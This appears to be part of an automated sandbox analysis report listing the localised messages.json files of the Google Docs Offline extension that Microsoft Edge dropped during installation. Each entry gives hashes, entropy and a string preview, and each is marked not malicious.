Preview:	{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\fa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1305
Entropy (8bit):	4.673517697192589
Encrypted:	false
SSDEEP:	24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
MD5:	097F3BA8DE41A0AAF436C783DCFE7EF3
SHA1:	986B8CABD794E08C7AD41F0F35C93E4824AC84DF
SHA-256:	7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
SHA-512:	8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\fi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	911
Entropy (8bit):	4.6294343834070935
Encrypted:	false
SSDEEP:	12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
MD5:	B38CBD6C2C5BFAA6EE252D573A0B12A1
SHA1:	2E490D5A4942D2455C3E751F96BD9960F93C4B60
SHA-256:	2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
SHA-512:	6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\fil\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	939
Entropy (8bit):	4.451724169062555
Encrypted:	false
SSDEEP:	24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
MD5:	FCEA43D62605860FFF41BE26BAD80169
SHA1:	F25C2CE893D65666CC46EA267E3D1AA080A25F5B
SHA-256:	F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
SHA-512:	F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\fr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.622066056638277
Encrypted:	false
SSDEEP:	24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
MD5:	A58C0EEBD5DC6BB5D91DAF923BD3A2AA
SHA1:	F169870EEED333363950D0BCD5A46D712231E2AE
SHA-256:	0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
SHA-512:	B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\fr_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	972
Entropy (8bit):	4.621319511196614
Encrypted:	false
SSDEEP:	24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
MD5:	6CAC04BDCC09034981B4AB567B00C296
SHA1:	84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
SHA-256:	4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
SHA-512:	160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\gl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	990
Entropy (8bit):	4.497202347098541
Encrypted:	false
SSDEEP:	12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
MD5:	6BAAFEE2F718BEFBC7CD58A04CCC6C92
SHA1:	CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
SHA-256:	0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
SHA-512:	3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\gu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	4.294833932445159
Encrypted:	false
SSDEEP:	24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
MD5:	BC7E1D09028B085B74CB4E04D8A90814
SHA1:	E28B2919F000B41B41209E56B7BF3A4448456CFE
SHA-256:	FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
SHA-512:	040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\hi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1672
Entropy (8bit):	4.314484457325167
Encrypted:	false
SSDEEP:	48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
MD5:	98A7FC3E2E05AFFFC1CFE4A029F47476
SHA1:	A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
SHA-256:	D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
SHA-512:	457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\hr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	935
Entropy (8bit):	4.6369398601609735
Encrypted:	false
SSDEEP:	24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
MD5:	25CDFF9D60C5FC4740A48EF9804BF5C7
SHA1:	4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
SHA-256:	73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
SHA-512:	EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\hu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1065
Entropy (8bit):	4.816501737523951
Encrypted:	false
SSDEEP:	24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
MD5:	8930A51E3ACE3DD897C9E61A2AEA1D02
SHA1:	4108506500C68C054BA03310C49FA5B8EE246EA4
SHA-256:	958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
SHA-512:	126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\hy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2771
Entropy (8bit):	3.7629875118570055
Encrypted:	false
SSDEEP:	48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
MD5:	55DE859AD778E0AA9D950EF505B29DA9
SHA1:	4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
SHA-256:	0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
SHA-512:	EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
Malicious:	false
Preview:	{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\id\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	858
Entropy (8bit):	4.474411340525479
Encrypted:	false
SSDEEP:	12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
MD5:	34D6EE258AF9429465AE6A078C2FB1F5
SHA1:	612CAE151984449A4346A66C0A0DF4235D64D932
SHA-256:	E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
SHA-512:	20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\is\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	954
Entropy (8bit):	4.6457079159286545
Encrypted:	false
SSDEEP:	12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
MD5:	CAEB37F451B5B5E9F5EB2E7E7F46E2D7
SHA1:	F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
SHA-256:	943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
SHA-512:	A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
Malicious:	false
Preview:	{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\it\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	899
Entropy (8bit):	4.474743599345443
Encrypted:	false
SSDEEP:	12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
MD5:	0D82B734EF045D5FE7AA680B6A12E711
SHA1:	BD04F181E4EE09F02CD53161DCABCEF902423092
SHA-256:	F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
SHA-512:	01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\iw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2230
Entropy (8bit):	3.8239097369647634
Encrypted:	false
SSDEEP:	24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
MD5:	26B1533C0852EE4661EC1A27BD87D6BF
SHA1:	18234E3ABAF702DF9330552780C2F33B83A1188A
SHA-256:	BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
SHA-512:	450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
Malicious:	false
Preview:	{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\ja\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1160
Entropy (8bit):	5.292894989863142
Encrypted:	false
SSDEEP:	24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
MD5:	15EC1963FC113D4AD6E7E59AE5DE7C0A
SHA1:	4017FC6D8B302335469091B91D063B07C9E12109
SHA-256:	34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
SHA-512:	427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

C:\Users\user\AppData\Local\Temp\scoped_dir7524_894024091\CRX_INSTALL\_locales\ka\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3264
Entropy (8bit):	3.586016059431306
Encrypted:	false
SSDEEP:	48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
MD5:	83F81D30913DC4344573D7A58BD20D85
SHA1:	5AD0E91EA18045232A8F9DF1627007FE506A70E0
SHA-256:	30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
SHA-512:	85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
Malicious:	false
